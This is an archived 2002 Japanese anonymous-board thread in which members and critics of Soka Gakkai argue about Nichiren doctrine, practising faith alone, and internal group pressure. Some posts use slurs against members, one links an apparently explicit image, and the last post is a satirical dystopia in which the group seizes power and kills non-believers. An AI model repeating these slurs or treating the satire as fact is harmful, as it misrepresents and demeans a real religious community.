信じて、それを全うされるなら信仰者にとって生涯最高の財産だと思いますし、
垣根を越えた他宗教との分ち合いも自然と可能だと思います。

で話は戻り、とりもかくにも
先の投げやりな態度は今後出来るだけ慎むようにお願い致します。

240 :ezweb:02/07/13 06:51 ID:Bz2slH4n
今のところ僕の偽物はいない…つーの!今のイージー書き込み可。ところで波木井さん、「本尊は認められないが…略」は僕も同じです。これは僕の疑問であり興味なんですが、葵講の本尊は一体どんなの?立正佼成会のは?続

241 :(nn:):02/07/13 06:52 ID:Oa1dbDfz
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
 『犬猫板』で再び精神異常なことをしでかした奴がいる。

 『野良猫を見たら即保健所に連絡してください 』
79 名前:わんにゃん@名無しさん :02/07/13 04:56 ID:JYcDOqWI

★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★


242 :ezweb:02/07/13 06:54 ID:obcNz7Uu
あと、勤行は学会と同じ?

243 :Sb:02/07/13 09:46 ID:a2QIY/jB
とうとう召還してしまったか
ここは二人のスレになってしまったね

244 :184です:02/07/13 18:48 ID:???
ezwebさんがおっしゃることは、よく解ります。
「法華経を持ち奉るとは我が身仏身と持つなり」
仏法を難しく語る人がいますが、御本尊を拝すれば明確な解答が現されています。
「善につけ悪につけ法華経を捨つるは・・」、とはどういうことかも理解できます。
妙法が何かを知っていれば、特別な事ではないんですよね。
と同時に、とても大切なことです。
ezwebさん、私は大丈夫です(^_^)
ありがとうございました。

245 :ezweb:02/07/14 00:41 ID:l+eaNUbV
>>243何か僕変なことしましたかね?いままで通りじゃないですか?>>244いやぁ…図々しく話し過ぎましたか。あなたの場合心に傷を受けてるんじゃないかと思ったんです。学会の中のそういう類の問題はあるのは知ってましたから。でも大丈夫みたいですね。

246 :ezweb:02/07/14 00:55 ID:i5a5zV3a
>>239首突っ込んでいいですか?あなたの場合何かコンプレックスを持ってる感じがします。それと無宗教のことがごちゃまぜになってる感じがしたので…。以上です。

247 :ezweb:02/07/15 06:28 ID:QJsXc+dY
波木井氏は来ないつもりなのでしょうか?誰か情報ありませんか?

248 :184です:02/07/15 13:19 ID:???
なんか今、やたらと忙しいみたいです。
どこかのスレに本人がφ(..)mしてました。

249 :聖教分離名無しさん:02/07/15 13:59 ID:zEvAhG+E
>>236
> 無宗教は無宗教、それはそれでいい。ただ宗教者に干渉しすぎるよね。
> でこちらが受け入れないと”カルトだキチガイだ”と言ってくる。
> あいつはわからんやつだと。
> でも”無宗教という宗教”を押し付けている点では学会員と同じレベルだって
> 連中気が付いていないんだよね。で連中、トチ狂うからなあ。

ハキリよ、こんなところで愚痴ってないで、

http://kaba.2ch.net/test/read.cgi/koumei/1026493385/167

の質問に答えたらどうだ?


250 :転載名無しさん:02/07/15 15:20 ID:9GahyzkN

169 :Sb ◆euHcFBHE :02/07/15 12:10 ID:p2LCEFLA
>>163
信仰は持っていても、宗教団体に属していない人もいるんだよ


170 :名無しさん@お腹いっぱい。 :02/07/15 12:25 ID:???
そうそう、宗教団体に入る事、入っている事が信仰だと1が思っているのなら
非常に恥ずかしい誤謬だよ。

171 :名無しさん@お腹いっぱい。 :02/07/15 12:34 ID:JKQr6v94
>信仰は持っていても、宗教団体に属していない人もいるんだよ

そうだよね。
それにあらゆる宗教の開祖様はどんな宗教団体に属していなかった。
みんな一人で道を拓いたんだよ。(あとで弟子ができたけど)
なんか宗教団体に群れる人は宗教の本質を忘れているね。


251 :名無しさん@お腹いっぱい。:02/07/15 17:26 ID:???
組織につかないと実践できないのだそうですよ。
ある人が言ってましたが、今でも言ってるでしょうか?

252 :名無しさん@お腹いっぱい。:02/07/15 18:42 ID:???
>247

http://kaba.2ch.net/test/read.cgi/koumei/1017324649/399

253 :ezweb:02/07/15 19:19 ID:dN4/Iaiy
どうも>>249さんは波木井氏を学会員と勘違いしているんじゃないですか?リンク先の質問に答えます。僕は学会員です。宗教法人の取得の理由は宗門が好き勝手を始めたときのためというのが主です。続

254 :ezweb:02/07/15 19:27 ID:/KJYllgp
実際日顕は「学会不当破門」「大客殿取り壊し」「本尊偽物発言」等々、曲がってしまいました。戦時中の神札受諾もそうです。次に寺からの破門には何の意味もありません。なぜなら信仰の実践には寺や僧侶は関係ないからです。寺の伝統と権威を重視するのは破仏法です。

255 :ezweb:02/07/15 19:30 ID:NWiZFX4a
次に宗旨、教学、本尊の有無ですが、三つともあります。確かにどれが欠けても滑稽です。

256 :名無しさん@お腹いっぱい。:02/07/15 19:57 ID:???
若衆はここまで狂ってるのか
これでは二世・三世の世代に期待はできないぞ

257 :名無しさん@お腹いっぱい。:02/07/15 20:19 ID:LCCgOuN9
それで広宣流布が達成されたらどんな世の中になんの?誰に聞いても全く具体性がない。なんの為に一生かけてんの?全ての人がどんな夢もかなうようになんの?そんなことあるわけないじゃん。

258 :名無しさん@お腹いっぱい。:02/07/15 21:30 ID:???
>なんか宗教団体に群れる人は宗教の本質を忘れているね。
組織に属さずに、一人で信仰を持ち続けると、祈りが自分のための祈りに
なり結局仏にはなりにくい。




259 :Bartholomew von Roach ◆XYc9hl7E :02/07/15 21:44 ID:???
一人で信仰を持ち続けずに、閉鎖的組織で信仰を持ち続けると、
祈りが閉鎖的組織のための祈りになり結局仏にはなりにくい。

とか、

学会で信仰を持ち続けると、祈りが学会のための祈りになり結局仏にはなりにくい。

…ともいえなくもない。

260 :名無しさん@お腹いっぱい。:02/07/15 21:52 ID:???
なぜ組織につかなければいけないのかというとだな、
難しいことは言えないが、一人だと、信仰を一生持ち続けることが困難なことや、
他人を救っていこうという気持ちが薄れ、自分の幸せのためだけの祈りになるからだよ。
自分だけよければいいという考えは二乗の考えであって、仏の実践ではないのですよ。
同士と励ましあい、切磋琢磨し、また、他人の幸せをも祈っていく。他人のことを祈れることが
尊いのです。

261 :名無しさん@お腹いっぱい。:02/07/15 21:55 ID:bKzezsJt
>258
組織の大事さも理解できますが、そろそろ一人信心の人も認めてください。
そうした人が層化の中には多いんです。
財務や選挙、平和活動にも参加しているんですよ。


262 :名無しさん@お腹いっぱい。:02/07/15 21:59 ID:???
>>261
学会員で、日蓮仏法を信仰してるが学会組織にはついてない人が多いと言ってる
のですか?確認してないから、いないとも言えないけど、多くはないと思いますよ。

263 :ezweb:02/07/15 22:01 ID:IFZy/q/+
>>257広宣流布達成(世界の1/3が学会員1/3が理解者1/3が無理解者…?)した時のことが確か御書にあったはず。「晴れて欲すぃー」と思うだけで晴れてしまう、という内容、という記憶(笑

264 :258、262:02/07/15 22:01 ID:???
俺が部員周りをしている地区では、そのような「一人信心」の学会員はいませんし、
本部単位、区単位でも聞いたことはありません。

265 :名無しさん@お腹いっぱい。:02/07/15 22:05 ID:???
>260
二乗作仏を認めている法華経を信奉する団体から
なぜにこういう発言が出るんだろう?
自分たちの利益に反するためだけなんだろうな
本当のところは

266 :ezweb:02/07/15 22:08 ID:yDqeVyCO
>>261一人信心を認める認めないなんて学会員が否他人が決めることではないでしょう。本人が決めることです。ただ先ほどの誰かの書き込みみたいに、一人じゃ難しいですよ。因みに僕は…学会が嫌いなところもあって大体一人ですよ。それを良いとは思いませんけど。

267 :258、262:02/07/15 22:08 ID:???
>>265
二乗作仏と私の言う「二乗のままではいけない」というのは矛盾してませんが何か?

268 :258、262:02/07/15 22:13 ID:???
260のカキコは私っす。

269 :258、262:02/07/15 22:20 ID:???
なんだ。>>265はよくある「書き殴り系」の書き込みだったか。
話をするつもりはなく、ただの浅薄なツッコミだけというやつ。

270 :名無しさん@お腹いっぱい。:02/07/15 22:38 ID:OOnGdX3n
んで仏って何なの?なんでものぞみがかなうって事?

271 :265:02/07/15 22:50 ID:???
すまない
発言者の意図に混乱した。

あとで書くつもりでっす。

272 :265:02/07/15 23:22 ID:???
法華経は地湧の菩薩を最上とするから、
「二乗のままではいけない」とする理屈になるかもしれない。

集団でなければ信仰ができない、難しいという話に戻して
くれまいか。
無理な折伏などを要求するから難しいのでは?
その反論を希望。

273 :名無しさん@お腹いっぱい。:02/07/16 00:29 ID:OLbKW8Ki
むずかしいむずかしくないの前に学会員で誰か仏になった人なんているの?池田先生も仏じゃないんでしょ?

274 :265:02/07/16 00:42 ID:???
誘いを受けたのに〜
やっぱり罵倒したいだけだったか。
もっとも、まともに話なんか…

二乗とは日本では具体的に誰を指すのでしょうか。
生命状態のことをいうのでしょうか。それなら
今の層化は二乗そのものに見えるんですけど。

275 :名無しさん@お腹いっぱい。:02/07/16 00:49 ID:0E4cnNAn
層化の人はこうゆうのはどうですか?
http://www.hostones.com/websites/asians/temptations/AyaOtosaki/pics/24.jpg

276 :258、262:02/07/16 01:01 ID:hxR29dn1
>>272
>無理な折伏などを要求するから難しいのでは?
始めから「折伏」を無理だと考えてるところから誤解なのですよ。
折伏いうのは、別に入会してもらうこと、ご本尊を流布することだけ
ではありません。自分が、信心をしてどのように変わったか、学会の
ことを一言でも友人、知人等に語っていくことも折伏なのです。

・・と、いうことを確認のため書いておいてですな、
集団でなければ難しいというのは、たとえば、御書の研鑚など、一人では
なかなかできないものです。ほかの人に教えてもらいながら、仏法理解の一助にするもの
ですから。
一人で信心していると、「迷い」「魔」が起こったときに、どう対処できるというの
でしょう?大きな風が吹いてきたときに、一人で立ち続けることが困難なように、多くの
同士と支えあい、切磋琢磨して成長するのが望ましいと考えます。



277 :258、262:02/07/16 01:02 ID:hxR29dn1
ID出しました。

一応、前の「258、262」と同じ人物です。

278 :261:02/07/16 01:05 ID:LRGVZUDV
二乗だなんだは、末法においては関係ないのでは?
それにこだわっている時点で、実仏が解らなくなっちゃう。
御本尊の中央には題目ですよ。

279 :261:02/07/16 01:08 ID:LRGVZUDV
ezwebさん、ありがとうございます。
そうですね。誰に何を言われても、最後は自分で選択することが大事ですね。

280 :261:02/07/16 01:11 ID:LRGVZUDV
>277
私はただ組織活動するしないで、ひとを評価して欲しくないだけです。

281 :261:02/07/16 01:14 ID:LRGVZUDV
>277
「福運が切れる」とか言われたら、やはりよい気分ではありません。
それは本人が感じるものだと思います。


282 :261:02/07/16 01:15 ID:LRGVZUDV
あれ?いないのかな。
では、寝ま〜す。
おやすみなさい。


283 :名無しさん@お腹いっぱい。:02/07/16 01:18 ID:hxR29dn1
>>280
組織についたほうが良いと言ってるだけですよ。その人のためですよ、これはマジで。

>>281
福運が切れるのは、脱会した場合のことでは?


284 :281じゃないけど:02/07/16 01:26 ID:???
>>283
>福運が切れるのは、脱会した場合のことでは?

ううん、違う。
学会内部でイジメをするときにも使う。

285 :Bartholomew von Roach ◆XYc9hl7E :02/07/16 01:44 ID:???
>>284
もしかして「福運が切れた」というのは、
「いじめのターゲット」を意味する学会の暗語だったか!?

286 :261:02/07/16 01:56 ID:JBR5TpoY
>283
まだ起きてました(~_~;)
私は組織活動している人を尊敬します。
でも、私たちに対する活動者の目が冷たい時があります。
新聞の指導でも滅茶苦茶書かれるし、悲しいものがあります。
まあ、それを発奮材料に頑張ればいいのですが・・・
希望を与えるどころか、自信をなくさせる、私の人生を否定されるような発言まで
あります。それを改善して欲しいだけです。
もちろん、貴方は違う、良識派であるのかもしれませんが・・・
そんなところです。
では、ほんとにおやすみなさい。良い夢を・・・


287 :261:02/07/16 02:01 ID:JBR5TpoY
P.S.
脱会者に対しても「福運が切れた」はまずいでしょ。
ゴルバチョフやヘンダーソン博士のように入会されない方にも言えますか?

288 :Bartholomew von Roach ◆XYc9hl7E :02/07/16 02:04 ID:???
彼の「福運が切れた」瞬間を見てみたい♪

289 :281じゃないけど:02/07/16 02:23 ID:RKNJN2qd
>287さん
こんな事言うと逆効果になるかもしれないけど、脱会すれば?

もし、あなたの条件が許してバリバリ活動できるようになったとしても
「慢心が芽生えてる」とか「組織利用している」とか
『幹部(あるいは他の会員)を怨嫉している』等と
陰口を言われるのは、目に見えている。

法華教が好きで日蓮が好きで題目をあげるのが好きなら
学会にとどまる必然性は無いのでは?
学会も日蓮直結の信心は謗法では無いと言ってる事だし。

290 :Bartholomew von Roach ◆XYc9hl7E :02/07/16 02:45 ID:???
・慢心が芽生えてる
・組織利用している
・幹部(あるいは他の会員)を怨嫉している

…どれも主観的な評価である。

しかも、「組織利用している」なんてのは、解釈によっては、
彼とか幹部とか職員なんて、全員そうだろ。
組織から集めたお金で、生活しているんだから。

291 :261:02/07/16 02:46 ID:???
>>270
仏についての大ヒント
270さんも、既に仏だということです。
仏であったりなかったりしているような変化相の仏のことではありません。
部分や側面でもありません。気付こうが気付かまいが、常に仏です。


292 :261:02/07/16 02:54 ID:???
>288
Roachさん、
福運は切れません(^_^)
本人次第です
>289
まだ、頑張ります。

んじゃ

293 :名無しさん@お腹いっぱい。:02/07/16 02:58 ID:OftAAlzr
ん? 福運が本人次第ってどういうことじゃ?
心がけが悪かったり、努力不足だとやっぱし切れるのかな?
でも確かに福運が切れるって面白い。

294 :281じゃないけど:02/07/16 03:01 ID:RKNJN2qd
>>290
>どれも主観的な評価である。

それらは信心の眼から見れば、単なる主観じゃない事がわかってくる。
と、創価は言ってるんだよね(w

いずれ「創価学会」が衰退していく事は間違いないにしても、
21世紀初頭にこんんな時代錯誤なカルトが、政権の一角に存在してた事自体が
恥ずかしいよ。

295 :Bartholomew von Roach ◆XYc9hl7E :02/07/16 03:23 ID:???
>>294
> それらは信心の眼から見れば、単なる主観じゃない事がわかってくる。

別の宗教が「あの世と通信ができる」(主観)というのと、
たいした差がない。って思ってしまった…

296 :Sb ◆euHcFBHE :02/07/16 11:50 ID:xJ9zmSbl
>>258
自分のために祈りなんかしねぇよ
あんた本当に仏法の何たるかを解って書いてんの?

>>260
信仰を持ち続けることが人生じゃないんだよ、あんたは、そういうふうに教わっただけだろ
自分で導き出したわけじゃないだろ
同士と励ましあい、切磋琢磨し?生きてれば人と接し、励ましあい、切磋琢磨するものだろ
別に学会だけじゃないんだよ
>他人の幸せをも祈っていく。他人のことを祈れることが尊いのです。
あんたは、学会にいないとそんなこともできないのか?

>>276
結局、はじめから人任せなのね
>一人で信心していると、「迷い」「魔」が起こったときに、どう対処できるというのでしょう?
釈迦は自分で振り払ったでしょ


297 :Sb ◆euHcFBHE :02/07/16 11:53 ID:xJ9zmSbl
261さんの言っていることが本当の仏法


298 :?*8:02/07/16 14:02 ID:???
2***年7月日本の全国民の三分の一が創価学会員になり
またのこりの三分の一が賛同した世界になりました。
時の創価学会会長は、広宣流布の完了を宣言し、政権政党
となった公明党の絶対多数の賛成により、憲法改正を行い
創価学会宗を日本の国教とすることを宣言し他の宗教を
一切禁止した。また民主主義を解体し、公明党以外の政党
活動を認めず、公明党の一党独裁制を確立した。
新たに創価学会会長を日本の首長と定めすべてこれに
従うようあらゆる法律を強行採決により改正した。
これを受け創価学会青年部により、創価学会員以外の人間の
大規模な折伏を始め、改宗しない人間の投獄、死刑、国外追放を
全国規模で行った。
また創価学会以外の、ありとあらゆる宗教的建物、事物、
文献の破壊、焼却を行い、これにより世界的な文化遺産の
多くを失うこととなった。
これらはすべて邪宗は国を滅ぼし、国民を惑わすものとして、
積極的に行動することが日本国民の義務であり、従わない者は
仏罰があたったとして、虐殺されていった。
このようにして国内の基盤を固めた創価学会会長は、全世界の
広宣流布を始めることを宣言し、隣国に大規模な武装広宣流布隊
を派遣し・・・・・・・。

創価学会のみなさんあなた達はこのような世界を作ろうとして
活動しているのですか。


81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)